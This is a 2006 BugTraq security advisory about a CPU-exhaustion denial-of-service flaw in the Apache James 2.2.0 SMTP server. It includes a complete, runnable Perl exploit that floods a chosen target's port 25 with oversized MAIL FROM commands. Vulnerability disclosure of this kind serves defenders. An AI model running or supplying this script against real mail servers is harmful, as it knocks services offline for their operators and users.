BugTraq
JAMES 2.2.0 <-- Denial Of Service May 28 2006 10:15AM
y3dips echo or id
------------------------------------------------------------------------
---

[ECHO_ADV_31$2006] JAMES 2.2.0 <-- Denial Of Service

------------------------------------------------------------------------
---

Author : y3dips a.k.a Ahmad Muammar W.K

Date : April, 27th 2006

Location : Indonesia, Jakarta

Web : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Java Apache Mail Enterprise Server (a.k.a. Apache James)

version : 2.2.0

URL : http://jakarta.apache.org/avalon/phoenix

Description :

The Java Apache Mail Enterprise Server (a.k.a. Apache James) is

a 100% pure Java SMTP and POP3 Mail server and NNTP News server.

James also designed to be a complete and portable enterprise mail

engine solution based on currently available open protocols.

James is based upon the Apache Avalon application framework.

(For more information about Avalon, please go to http://avalon.apache.org/)

James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3).

------------------------------------------------------------------------
----

Vulnerability:

~~~~~~~~~~~~~~

James SMTP servers are allowing attacker to supply a long variable at

SMTP argument (such as MAIL) to the SMTP server, because of this

vulnerability the Processor at server machine will have a workload till 100%

Exploit Code:

~~~~~~~~~~~~~

-------------------------- james.pl-----------------------------------------

#!/usr/bin/perl -w

use IO::Socket;

print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

if(@ARGV == 1)

{

my $host = $ARGV[0];

my $i = 1;

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)

or die " Cannot Connect to Server !";

while ( $i++ ) {

print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and

print " -- sucking CPU resources at $host .....\n";

sleep(1);

}

close $socket;

}

else

{ print " Usage: $0 [target] \r\n\n"; }

------------------------------------------------------------------------
---

Shoutz:

~~~~~~~

~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous

~ newbie_hacker (at) yahoogroups (dot) com [email concealed]

~ #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
---

Contact:

~~~~~~~~

Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id

Homepage: http://y3dips.echo.or.id/

Blogs : http://y3d1ps.blogspot.com/

-------------------------------- [ EOF ] ----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus